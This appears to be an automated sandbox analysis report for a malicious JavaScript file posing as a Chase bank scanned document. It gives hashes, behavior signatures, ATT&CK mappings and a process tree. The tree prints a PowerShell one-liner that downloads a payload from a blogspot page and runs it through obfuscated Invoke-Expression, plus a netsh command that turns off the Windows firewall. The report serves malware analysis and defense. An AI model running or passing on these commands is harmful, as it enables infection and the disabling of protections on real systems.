Overview

overview

10

Static

static

1

New_ScanDo...ice.js

windows7-x64

7

New_ScanDo...ice.js

windows10-1703-x64

10

New_ScanDo...ice.js

windows10-2004-x64

10

New_ScanDo...ice.js

windows11-21h2-x64

10

Resubmissions

16-01-2024 10:45

240116-mtr1naaaeq 10

16-01-2024 10:39

240116-mpymmshhgp 10

Analysis

  • max time kernel
    143s
  • max time network
    271s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-01-2024 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New_ScanDoc#092387CHASEeAdvice.js

  • Size

    1.4MB

  • MD5

    286d534eb759c671fa9e79cfafd3bc85

  • SHA1

    d165938c1c607618c5cb6d9d11cf5b371f007ac7

  • SHA256

    77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b

  • SHA512

    3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b

  • SSDEEP

    192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4188
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7639.tmp" "c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\CSCA1C908A7EDF046C88043681E4A51E7A5.TMP"
          4⤵
            PID:4588
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:808
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
            PID:1768
          • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1168
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
              dw20.exe -x -s 780
              4⤵
              • Drops file in Windows directory
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious use of AdjustPrivilegeToken
              PID:408

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Persistence

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Privilege Escalation

      Abuse Elevation Control Mechanism

      1
      T1548

      Bypass User Account Control

      1
      T1548.002

      Boot or Logon Autostart Execution

      2
      T1547

      Registry Run Keys / Startup Folder

      2
      T1547.001

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Defense Evasion

      Abuse Elevation Control Mechanism

      1
      T1548

      Bypass User Account Control

      1
      T1548.002

      Impair Defenses

      1
      T1562

      Disable or Modify Tools

      1
      T1562.001

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      4
      T1082

      Lateral Movement

      Collection

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.dll
        Filesize

        3KB

        MD5

        b215617f60edf485138fed3ebe41c74d

        SHA1

        9c780185d017e67e54db1376267e13cc08b83526

        SHA256

        1c778635f38da4179544176b8637e6032171f46aef27f072de08ee69692db27b

        SHA512

        14cd36283e9686927db4f78bbf8e3c17dd4aea206ada1a4b8a44034811be3700101e51945b6140c553cd10edf7ea65e75a00428b1389401f719f1b14450979e1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES7639.tmp
        Filesize

        1KB

        MD5

        1bde72f5b19daffd3ab768be69d20b0f

        SHA1

        cd8cf78cd0ab524d4028b27e3ae95538372f1b4f

        SHA256

        3bc57bbeb13d1c924120d9a861e82f3684b4d8a03b4923d6ef0e3eac37958b2e

        SHA512

        c27193af67605c750ec12af9e563799326eb8a5c28e6902d7658564800b8137f4e4e03f714a7677f514f191413a573a9c7b8b97e18b5f4e562d9b93c58d70d43

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gfm0hvz4.4ot.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.0.cs
        Filesize

        870B

        MD5

        e06ebf853695db38aaac82c9af297ae4

        SHA1

        ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

        SHA256

        79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

        SHA512

        036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.cmdline
        Filesize

        369B

        MD5

        147f840e180ed7532f849aaf30701b10

        SHA1

        a8a114444fc3d77e6b43129800baf36edcecc618

        SHA256

        8f41cb45288cb64dc8205f78a2071548d48aab5f18d18d57f3aae790b85559cd

        SHA512

        6073df516bf4f9f257e2aba1207acfbd5b56a113fe936eb45622f45f8e01236c5958c39160a0897e8f4c32e9a25c2992430962fe28f96f8ccda3decccb639345

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\CSCA1C908A7EDF046C88043681E4A51E7A5.TMP
        Filesize

        652B

        MD5

        15a0a7667b44fdea46578ba7bfbdc1ef

        SHA1

        46b3adc8d7c21158cd38f323ac5b3da946f4575f

        SHA256

        4a9a9d6f6aec25a3d628438e677952bdd9f399857b00b0cf2927f80ae369dfe3

        SHA512

        21a85a8e15ab363fd8b862950938fab01e80abef57d19a6aca61c04be9934943f346990ad234a67c97165bca72bdbd5ecf0c9123778a22a61a887ae047e045f4

        Download Submit

      • memory/1148-31-0x0000013843490000-0x000001384349E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1148-34-0x00007FF997CB0000-0x00007FF998771000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1148-10-0x00007FF997CB0000-0x00007FF998771000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1148-28-0x000001385BBC0000-0x000001385BBC8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1148-11-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1148-13-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1148-12-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1148-30-0x000001385BD40000-0x000001385BE8E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/1148-5-0x000001385BBD0000-0x000001385BBF2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1148-32-0x00000138434D0000-0x00000138434EA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1148-33-0x000001385BD40000-0x000001385BE8E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/1148-14-0x000001385C520000-0x000001385C6E2000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/1148-36-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1148-37-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1148-67-0x00007FF997CB0000-0x00007FF998771000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1148-66-0x000001385BD40000-0x000001385BE8E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/1148-63-0x000001385BD40000-0x000001385BE8E000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/1148-59-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1148-42-0x0000013843540000-0x0000013843550000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1168-62-0x0000000070000000-0x00000000705B1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1168-52-0x0000000070000000-0x00000000705B1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1168-51-0x0000000000C50000-0x0000000000C60000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1168-50-0x0000000070000000-0x00000000705B1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1768-48-0x0000000070700000-0x0000000070CB1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1768-71-0x0000000070700000-0x0000000070CB1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/1768-46-0x0000000000400000-0x000000000048C000-memory.dmp

        Filesize

        560KB

        Download

      • memory/2648-40-0x00000000052E0000-0x0000000005884000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2648-44-0x0000000005040000-0x00000000050D2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/2648-43-0x0000000004F00000-0x0000000004F9C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/2648-41-0x0000000004DF0000-0x0000000004E56000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2648-47-0x0000000005890000-0x0000000005A52000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/2648-39-0x0000000000760000-0x00000000007EC000-memory.dmp

        Filesize

        560KB

        Download

      • memory/2648-38-0x0000000074480000-0x0000000074C30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2648-68-0x00000000066E0000-0x00000000066EA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2648-69-0x0000000074480000-0x0000000074C30000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2648-70-0x0000000005030000-0x0000000005040000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2648-45-0x0000000004EB0000-0x0000000004F00000-memory.dmp

        Filesize

        320KB

        Download